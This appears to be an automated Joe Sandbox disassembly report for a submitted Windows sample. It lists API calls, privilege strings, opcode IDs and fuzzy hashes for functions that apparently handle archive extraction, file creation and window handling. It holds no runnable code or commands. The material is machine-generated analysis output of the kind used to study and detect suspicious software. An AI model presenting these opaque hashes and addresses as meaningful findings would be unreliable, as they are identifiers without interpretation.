                                          • Opcode ID: 31fbe40a45a830a547246fb601f63f98abc3b1f553e2980d80c45282f8c02313
                                          • Instruction ID: ee86ebd0e7af7c3245bfbab887a674b643d7dc37c2c28f3af4555677430f1657
                                          • Opcode Fuzzy Hash: 31fbe40a45a830a547246fb601f63f98abc3b1f553e2980d80c45282f8c02313
                                          • Instruction Fuzzy Hash: EA919472548348BBE721EBA4CC8DFFB77ACEB49B04F044819F745D6081D775A604AB62
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F86FAA
                                          • _wcslen.LIBCMT ref: 00F87013
                                          • _wcslen.LIBCMT ref: 00F87084
                                            • Part of subcall function 00F87A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F87AAB
                                            • Part of subcall function 00F87A9C: GetLastError.KERNEL32 ref: 00F87AF1
                                            • Part of subcall function 00F87A9C: CloseHandle.KERNEL32(?), ref: 00F87B00
                                            • Part of subcall function 00F8A1E0: DeleteFileW.KERNEL32(000000FF,?,?,00F8977F,?,?,00F895CF,?,?,?,?,?,00FB2641,000000FF), ref: 00F8A1F1
                                            • Part of subcall function 00F8A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00F8977F,?,?,00F895CF,?,?,?,?,?,00FB2641), ref: 00F8A21F
                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00F87139
                                          • CloseHandle.KERNEL32(00000000), ref: 00F87155
                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00F87298
                                            • Part of subcall function 00F89DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00F873BC,?,?,?,00000000), ref: 00F89DBC
                                            • Part of subcall function 00F89DA2: SetFileTime.KERNEL32(?,?,?,?), ref: 00F89E70
                                            • Part of subcall function 00F89620: CloseHandle.KERNEL32(000000FF,?,?,00F895D6,?,?,?,?,?,00FB2641,000000FF), ref: 00F8963B
                                            • Part of subcall function 00F8A4ED: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,00F8A325,?,?,?,00F8A175,?,00000001,00000000,?,?), ref: 00F8A501
                                            • Part of subcall function 00F8A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F8A325,?,?,?,00F8A175,?,00000001,00000000,?,?), ref: 00F8A532
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                          • API String ID: 3983180755-3508440684
                                          • Opcode ID: 294751548aa72cf8e68296a6783674deca39edef75e20afabf21de2befa12b7e
                                          • Instruction ID: 1f889690f78be1102c08492c4ca2c8e87d4c769895c722a6791fb66956ce4aee
                                          • Opcode Fuzzy Hash: 294751548aa72cf8e68296a6783674deca39edef75e20afabf21de2befa12b7e
                                          • Instruction Fuzzy Hash: C9C1F671D04704AAEB21FB74CC85FEEB7A8AF04300F14455AF956E3282D778EA44EB61
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: __floor_pentium4
                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                          • API String ID: 4168288129-2761157908
                                          • Opcode ID: 65f65e1898e6f4c0340e6440fdada032ad40a55b1c69c9d19b7d2139bc34ace0
                                          • Instruction ID: e832e76190c9d4c3f719c12d7eea45cff0ab5af3a995b172058aa9776e38f990
                                          • Opcode Fuzzy Hash: 65f65e1898e6f4c0340e6440fdada032ad40a55b1c69c9d19b7d2139bc34ace0
                                          • Instruction Fuzzy Hash: D8C250B2E046288FDB25CF28DD407EAB7B5EB49354F1541EAD44EE7240E778AE819F40
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: H_prolog_swprintf
                                          • String ID: CMT$h%u$hc%u
                                          • API String ID: 146138363-3282847064
                                          • Opcode ID: 9e76dcedf44c6e743b2b60fd61ac9248dad5e137f6c7fd0b8eeb364edc21f5fb
                                          • Instruction ID: 8eba6f5f7078a28e2e60068065a559b57a9b204e6cfa483cc2d77777d622077e
                                          • Opcode Fuzzy Hash: 9e76dcedf44c6e743b2b60fd61ac9248dad5e137f6c7fd0b8eeb364edc21f5fb
                                          • Instruction Fuzzy Hash: D33207715103849FDF18EF74CC96AE93BA5AF55700F08047DFC8A8B292DB78A649DB60
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F82874
                                          • _strlen.LIBCMT ref: 00F82E3F
                                            • Part of subcall function 00F902BA: __EH_prolog.LIBCMT ref: 00F902BF
                                            • Part of subcall function 00F91B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00F8BAE9,00000000,?,?,?,0001040C), ref: 00F91BA0
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F82F91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                          • String ID: CMT
                                          • API String ID: 1206968400-2756464174
                                          • Opcode ID: 8d64104a1cd0b8a7a7f41d22957b76a1496f9ec8a51816aa7eeafd4102ab8a5c
                                          • Instruction ID: a4851bc42b8ba8313b54a5e076ea8e2e98f86bc6e285854e9e7252bc1fc6868d
                                          • Opcode Fuzzy Hash: 8d64104a1cd0b8a7a7f41d22957b76a1496f9ec8a51816aa7eeafd4102ab8a5c
                                          • Instruction Fuzzy Hash: F6621B72A002458FDF19EF34C8857EA3BA1FF55310F04457EEC9A8B282DB75A945EB60
                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F9F844
                                          • IsDebuggerPresent.KERNEL32 ref: 00F9F910
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F9F930
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00F9F93A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                          • String ID:
                                          • API String ID: 254469556-0
                                          • Opcode ID: 22c1bb8a109d21b676e5fd856dc5bed8ab0bb150f1f788701017b798202253ab
                                          • Instruction ID: 5f4af1aecdf3f50ea621c7717c49667aafd165acda6983cf9612cd62f0ff8fd7
                                          • Opcode Fuzzy Hash: 22c1bb8a109d21b676e5fd856dc5bed8ab0bb150f1f788701017b798202253ab
                                          • Instruction Fuzzy Hash: D1311875D4521D9BEF20DFA4DD897CCBBB8AF08304F1041AAE40CAB250EB759B889F44
                                          APIs
                                          • VirtualQuery.KERNEL32(80000000,00F9E5E8,0000001C,00F9E7DD,00000000,?,?,?,?,?,?,?,00F9E5E8,00000004,00FE1CEC,00F9E86D), ref: 00F9E6B4
                                          • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00F9E5E8,00000004,00FE1CEC,00F9E86D), ref: 00F9E6CF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: InfoQuerySystemVirtual
                                          • String ID: D
                                          • API String ID: 401686933-2746444292
                                          • Opcode ID: 1e744db3d4ea21371a7652445fca65d997f0fb5343b79c41994e1b2a6901e8d2
                                          • Instruction ID: 8c6fc65bf444a7dc96d41a8fdac26b6e0a0ef94c30189451979c77e333e3a0af
                                          • Opcode Fuzzy Hash: 1e744db3d4ea21371a7652445fca65d997f0fb5343b79c41994e1b2a6901e8d2
                                          • Instruction Fuzzy Hash: 8101F732A40109ABDF14DE69DC49BDD7BAAAFC4334F0CC224ED19D7150E634D9059A81
                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00FA8FB5
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00FA8FBF
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00FA8FCC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 77fb4e877c8c0e101743cb9749241fbac1d4169c0b19341d47dcbe572a3665e8
                                          • Instruction ID: 06c7be58e964e38e80d9c2173d72c53ec814bc4358f3541add3c7af28e177c5e
                                          • Opcode Fuzzy Hash: 77fb4e877c8c0e101743cb9749241fbac1d4169c0b19341d47dcbe572a3665e8
                                          • Instruction Fuzzy Hash: 2C31D775D4121DABCB21DF64DC8879CBBB8AF48310F5042EAE41CA6250EB749F859F44
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .
                                          • API String ID: 0-248832578
                                          • Opcode ID: e30ff971084ee0f78698935effd1a6131f022d4563f2172f109d266998a61ad1
                                          • Instruction ID: fe03eb3580e29bae661c9b923b7a46076ab32de5c2b8cf2e928f2b2c70d363f2
                                          • Opcode Fuzzy Hash: e30ff971084ee0f78698935effd1a6131f022d4563f2172f109d266998a61ad1
                                          • Instruction Fuzzy Hash: 8A3106B19002496FCB24DE78CC84EFA7BBDDB86314F1442A8E918D7253E7349D45AB50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                          • Instruction ID: a34fa20681c56537e96ed5192ed89590ed7f372d4775af0ad2ec1488ad4e3b10
                                          • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                          • Instruction Fuzzy Hash: 71022CB1E012199FDF18CFA9C9806ADB7F1EF49324F258169D81AE7780D734AD41DB90
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00F9AF35
                                          • GetNumberFormatW.KERNEL32(00000400,00000000,?,00FBE72C,?,?,?,?,?,00000032), ref: 00F9AF84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: FormatInfoLocaleNumber
                                          • String ID:
                                          • API String ID: 2169056816-0
                                          APIs
                                          • GetLastError.KERNEL32(00F86DDF,00000000,00000400), ref: 00F86C74
                                          • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00F86C95
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          Similarity
                                          • API ID: ErrorFormatLastMessage
                                          • String ID:
                                          • API String ID: 3479602957-0
                                          APIs
                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00FB19EF,?,?,00000008,?,?,00FB168F,00000000), ref: 00FB1C21
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          Similarity
                                          • API ID: ExceptionRaise
                                          • String ID:
                                          • API String ID: 3997070919-0
                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F9F66A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          Similarity
                                          • API ID: FeaturePresentProcessor
                                          • String ID:
                                          • API String ID: 2325560087-0
                                          APIs
                                          • GetVersionExW.KERNEL32(?), ref: 00F8B16B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          Similarity
                                          • API ID: Version
                                          • String ID:
                                          • API String ID: 1889659487-0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: gj
                                          • API String ID: 0-4203073231
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00F9F3A5), ref: 00F9F9DA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          Similarity
                                          • API ID: HeapProcess
                                          • String ID:
                                          • API String ID: 54951025-0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                          • Instruction ID: 7d3f11ac604249a17e21c23be3e8ea475e1a41865eefceb7d958729dba190fb4
                                          • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                          • Instruction Fuzzy Hash: 99813DB17043465BFF24DE68CC90FBD77D4EBB5304F04092DE9868B282DA64A987A752
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4d8678d4ffb051459e289be6d2decc0d1c7032cbe9183da39d0e453ff903e9ce
                                          • Instruction ID: 81e557f33f6a8604987219f9a06ce5f1b732395d19e0ec0782e62f5dd2679063
                                          • Opcode Fuzzy Hash: 4d8678d4ffb051459e289be6d2decc0d1c7032cbe9183da39d0e453ff903e9ce
                                          • Instruction Fuzzy Hash: DF6189F6E00F0866DE389A686C957BE33D5EF83F60F140519E943DF282D6A5ED42B211
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                          • Instruction ID: 870ba44d1538620a03d6e1befdb73f9457f2b717899d69740053d18a5fd2ce42
                                          • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                          • Instruction Fuzzy Hash: 05515BE2A04F465BDF3445288956BBF73D9AB83F24F184819E883CB282C549ED05F3A1
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f883381b4e9b9d6c453085aee7066c890a71c1f029611bf5af309871843ff8a3
                                          • Instruction ID: 9ef8f5101f0dfde2749cffc5b583d024c08898375b7ff125f84f833f271aa3f6
                                          • Opcode Fuzzy Hash: f883381b4e9b9d6c453085aee7066c890a71c1f029611bf5af309871843ff8a3
                                          • Instruction Fuzzy Hash: 2051D63590C3D58EC701EF28C5444EEBFE0AF9A314F4909ADE4D95B243D221DA4EEB62
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 981fd2b680d6028ef55495c17c951eb23388513611c6e50b89bf63104587bf8f
                                          • Instruction ID: 286503116a08092e65b7228e3e6ba29eb3987af2bcda9255dd5113381532b67e
                                          • Opcode Fuzzy Hash: 981fd2b680d6028ef55495c17c951eb23388513611c6e50b89bf63104587bf8f
                                          • Instruction Fuzzy Hash: 7251DFB1A087159FC748CF19D88055AF7E1FF88314F058A2EE899E3340DB34E959CB96
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                          • Instruction ID: 3177dad1b0266c41c91ecd31e71dc4b66c4ab099a47c5e0625afd3d31b22c64c
                                          • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                          • Instruction Fuzzy Hash: 4C31E7B1A147468FDB18EF28CC512AABBE0FB95314F14452DE495C7341C739EA0ADB92
                                          APIs
                                          • _swprintf.LIBCMT ref: 00F8E30E
                                            • Part of subcall function 00F84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F840A5
                                            • Part of subcall function 00F91DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00FC1030,00000200,00F8D928,00000000,?,00000050,00FC1030), ref: 00F91DC4
                                          • _strlen.LIBCMT ref: 00F8E32F
                                          • SetDlgItemTextW.USER32(?,00FBE274,?), ref: 00F8E38F
                                          • GetWindowRect.USER32(?,?), ref: 00F8E3C9
                                          • GetClientRect.USER32(?,?), ref: 00F8E3D5
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00F8E475
                                          • GetWindowRect.USER32(?,?), ref: 00F8E4A2
                                          • SetWindowTextW.USER32(?,?), ref: 00F8E4DB
                                          • GetSystemMetrics.USER32(00000008), ref: 00F8E4E3
                                          • GetWindow.USER32(?,00000005), ref: 00F8E4EE
                                          • GetWindowRect.USER32(00000000,?), ref: 00F8E51B
                                          • GetWindow.USER32(00000000,00000002), ref: 00F8E58D
                                          Strings
                                          Similarity
                                          • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                          • String ID: $%s:$CAPTION$d
                                          • API String ID: 2407758923-2512411981
                                          • Opcode ID: 8f68d6a2a0d58330b0d9d180f78f1ea3a81b39d814aa46a8a04dad2c65b72b48
                                          • Instruction ID: 61e493e694e35d310a8f1e6f696993d10309864d76d5b3d23db54063cd56fb40
                                          • Opcode Fuzzy Hash: 8f68d6a2a0d58330b0d9d180f78f1ea3a81b39d814aa46a8a04dad2c65b72b48
                                          • Instruction Fuzzy Hash: C081A271608345AFD710EF68CC89AAFBBE9EF89714F04091DFA84D7290D734E9059B52
                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 00FACB66
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC71E
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC730
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC742
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC754
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC766
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC778
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC78A
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC79C
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC7AE
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC7C0
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC7D2
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC7E4
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC7F6
                                          • _free.LIBCMT ref: 00FACB5B
                                            • Part of subcall function 00FA8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FAC896,00FB3A34,00000000,00FB3A34,00000000,?,00FAC8BD,00FB3A34,00000007,00FB3A34,?,00FACCBA,00FB3A34), ref: 00FA8DE2
                                            • Part of subcall function 00FA8DCC: GetLastError.KERNEL32(00FB3A34,?,00FAC896,00FB3A34,00000000,00FB3A34,00000000,?,00FAC8BD,00FB3A34,00000007,00FB3A34,?,00FACCBA,00FB3A34,00FB3A34), ref: 00FA8DF4
                                          • _free.LIBCMT ref: 00FACB7D
                                          • _free.LIBCMT ref: 00FACB92
                                          • _free.LIBCMT ref: 00FACB9D
                                          • _free.LIBCMT ref: 00FACBBF
                                          • _free.LIBCMT ref: 00FACBD2
                                          • _free.LIBCMT ref: 00FACBE0
                                          • _free.LIBCMT ref: 00FACBEB
                                          • _free.LIBCMT ref: 00FACC23
                                          • _free.LIBCMT ref: 00FACC2A
                                          • _free.LIBCMT ref: 00FACC47
                                          • _free.LIBCMT ref: 00FACC5F
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: ac19eaf2f015ae3c691d7f2c5ed49f5fdaf0aadc42589f6dc3c5c3eed1bb6500
                                          • Instruction ID: 25fc99354eee5b7252e34605a449a03ae9f5945169bbfc2c90543bcb712a4bf7
                                          • Opcode Fuzzy Hash: ac19eaf2f015ae3c691d7f2c5ed49f5fdaf0aadc42589f6dc3c5c3eed1bb6500
                                          • Instruction Fuzzy Hash: FE3162F1A003059FEB20AA39DC46B56B7E9EF523A0F105419E158D7192DF75EC42EBA0
                                          APIs
                                          • _wcslen.LIBCMT ref: 00F99736
                                          • _wcslen.LIBCMT ref: 00F997D6
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00F997E5
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00F99806
